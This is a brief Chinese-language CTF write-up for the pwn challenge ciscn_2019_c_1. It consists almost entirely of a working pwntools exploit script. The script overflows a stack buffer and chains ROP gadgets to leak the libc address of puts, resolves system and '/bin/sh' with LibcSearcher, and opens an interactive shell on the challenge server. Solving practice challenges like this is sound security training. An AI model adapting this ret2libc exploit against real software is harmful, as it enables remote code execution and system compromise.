pwn | ciscn_2019_c_1

ciscn_2019_c_1

x64下的 ret2libc + 构造rop
同样还是要注意libc版本>2.27的时候call system要16位对齐，所以这里多了一个ret

exp:

from pwn import *
from LibcSearcher.LibcSearcher import *
import time

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 25865)
# sh = process('./ciscn_2019_c_1')
# sh = gdb.debug('./warmup_csaw_2016', '0x00000000004006A3')

elf = ELF('./ciscn_2019_c_1')    # get elf file

p_pop_rdi_ret = 0x0000000000400c83
p_main = 0x400b28
p_ret = 0x4006b9

# get function addrs
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

print('puts_plt:'+str(puts_plt))
print('puts_got:'+str(puts_got))

# strategy delay
time.sleep(1)



sh.recv()
# choice
sh.send('1\n')
sh.recvuntil('encrypted\n')

# stack over flow
tmp = b'\x00'+b'a'*(0x50-1+8)   # cover all the stack until the retaddr
tmp += p64(p_pop_rdi_ret)
tmp += p64(puts_got)     # let rdi=puts_got
tmp += p64(puts_plt)    # call puts   print the addr of 'puts' in libc
tmp += p64(p_main)    # ret2main


sh.sendline(tmp)
# print(tmp)
sh.recvline()
sh.recvline()

puts_libcaddr = (u64(sh.recvuntil('\n',drop=True).ljust(8,b'\x00')))
print("puts:"+str(hex(puts_libcaddr)))

libc = LibcSearcher('puts', puts_libcaddr)
offset = puts_libcaddr - libc.dump('puts')
p_binsh = offset + libc.dump('str_bin_sh')
p_system = offset + libc.dump('system')

sh.recv()
sh.send('1\n')   # second choice
tmp = b'\x00' + b'M'*(0x50-1+8)
tmp += p64(p_ret)    # for ubuntu 18 call system
tmp += p64(p_pop_rdi_ret)
tmp += p64(p_binsh)
tmp += p64(p_system)

sh.recv()
sh.sendline(tmp)

sh.interactive()

sh.close()

基本就是这样
over.